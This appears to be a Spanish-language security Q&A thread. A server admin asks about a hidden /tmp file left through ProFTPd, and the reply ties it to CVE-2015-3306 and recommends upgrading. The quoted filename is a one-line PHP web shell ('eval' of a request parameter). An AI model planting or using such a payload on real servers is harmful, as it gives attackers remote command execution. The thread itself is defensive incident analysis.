código PHP en el nombre de archivo ubicado en la carpeta / tmp. ¿Qué tan preocupado debería estar?

3

Recientemente descubrí un archivo oculto en /tmp de propiedad de proftpd que me preocupa un poco:

-rw-r--r--  1 proftpd         nogroup       <timestamp>       86  .<?php eval($_REQUEST[cmd]); ?>

Intenté ver su contenido en un editor de texto, pero probablemente fue un mal movimiento, ya que altera la última propiedad de tiempo de acceso. De todos modos aquí está la salida de stat :

  File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
  Size: 86          Blocks: 8          IO Block: 4096   regular file
Device: fc00h/64512d    Inode: 175564      Links: 1
Access: (0644/-rw-r--r--)  Uid: (  113/ proftpd)   Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
Birth: -

La verificación del registro de proftpd en el momento en que se modificó el archivo me da muchas entradas como esta:

<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory

¿Podría usarse este archivo como parte de un exploit?

Estoy trabajando en un entorno de servidor LAMP.

    
pregunta taran 17.04.2016 - 13:24
fuente

1 respuesta

4

Parece que alguien está utilizando esta vulnerabilidad:

ProFTPd 1.3.5 - Copia de archivo

enlace

Aquí también está CVE-2015-3306 :

enlace

Verifique su versión proftpd proftpd -v , si todavía es una versión antigua, actualice a 1.3.6rc1 . Si quieres algo mejor, entonces considera usar sftp y no ftp .

    
respondido por el Mirsad 17.04.2016 - 14:05
fuente

Lea otras preguntas en las etiquetas